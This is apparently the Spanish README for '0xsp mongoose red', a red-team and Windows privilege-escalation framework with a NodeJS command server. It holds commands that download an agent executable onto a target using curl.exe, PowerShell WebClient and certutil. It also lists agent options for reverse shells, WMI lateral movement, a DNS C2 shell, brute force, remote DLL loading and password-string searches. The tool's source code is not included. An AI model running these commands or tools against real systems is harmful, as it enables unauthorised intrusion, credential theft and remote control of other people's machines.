
un framework único para simulación de ciberseguridad y operaciones de red team, auditoría de Windows para vulnerabilidades más recientes, configuraciones incorrectas y ataques de escalada de privilegios, replicar las tácticas y técnicas de un adversario avanzado en una red.
Apoya el proyecto para el desarrollo continuo (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
Versión actual 2.2.0
La versión roja de 0xsp mongoose se proporciona para ayudar a sus necesidades durante la simulación de ciberseguridad; al usar esta versión, podrá auditar un sistema operativo Windows objetivo en busca de vulnerabilidades del sistema, configuraciones incorrectas y ataques de escalada de privilegios, y replicar las tácticas y técnicas de un adversario avanzado en una red.
Con el soporte de NodeJS para la API de aplicaciones web, la instalación y personalización se vuelve mucho más fácil y oportuna. El agente sensor de Windows se comunicará con la API de la aplicación para transferir resultados y recibir comandos como técnica bidireccional.
El agente es capaz de identificar y detectar exploits de Windows mediante el uso de los módulos windows update api y exploit database definitions. La nueva versión también detectará las siguientes vulnerabilidades.
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
Credenciales de acceso predeterminadas:
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#example 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --recuperar servicios de Windows y controladores instalados.
-u --recuperar información sobre usuarios, grupos, roles.
-c --buscar controladores conectados para archivos de configuración sensibles por extensión.
-n --recuperar información de red, interfaces de red, detalles de conexión.
-w --enumerar directorios escribibles, verificar permisos de acceso, permisos modificados.
-i --enumerar información del sistema de Windows, sesiones, verificación de elevación siempre activa.
-l --buscar en cualquier archivo una cadena específica, ej: agent.exe -l c:\ password *.config.
-o --especificar dirección host de la aplicación NodeJS, también se puede usar srvhost.
-p --enumerar software instalado, procesos en ejecución, tareas.
-e --herramienta de inspección del kernel, ayudará a buscar en bases de datos de herramientas vulnerabilidades del kernel de Windows.
-x --contraseña para autorizar su conexión con la aplicación NodeJS.
-d --descargar archivos directamente en la máquina objetivo.
-t --subir archivos desde la máquina objetivo a la aplicación NodeJS.
-spooler --escanear un solo host o una lista de hosts para posible CVE-2021-1675 (ej: -spooler -srvhost o -spooler -hosts)
-m --ejecutar todos los tipos de escaneo conocidos juntos.
[!] SECCIÓN DE TÁCTICAS DE RED TEAM
-r --generar una shell inversa con una cuenta específica.
-lr --técnica de movimiento lateral usando WMI (ej: -lr -host 192.168.14.1 -username administrador -password blabla -srvhost ipnodejs)
-nds --descubrimiento de red y enumeración de recursos compartidos
-dns --establecer shell interactivo DNS C2C
-cmd --transferir comandos a través de shell HTTP
-interactive --iniciar modo interactivo (ej: cargando plugins...)
-username --autenticación de identidad para módulos de ataque específicos.
-password --autenticación de identidad para módulos de ataque específicos.
-host --identificar host remoto para realizar un ataque.
-srvhost --establecer el host remoto de la aplicación NodeJS.
-bf --módulo de fuerza bruta para usuarios locales / usuarios de dominio.
-import --importar y ejecutar un archivo DLL localmente.
-remote --importar y ejecutar un archivo DLL desde un host remoto.
https://0xsp.com/security%20dev/0xsp-mongoose-red
Asegúrate de suscribirte al siguiente canal para recibir notificaciones cuando se publiquen nuevos tutoriales y trucos para 0xsp.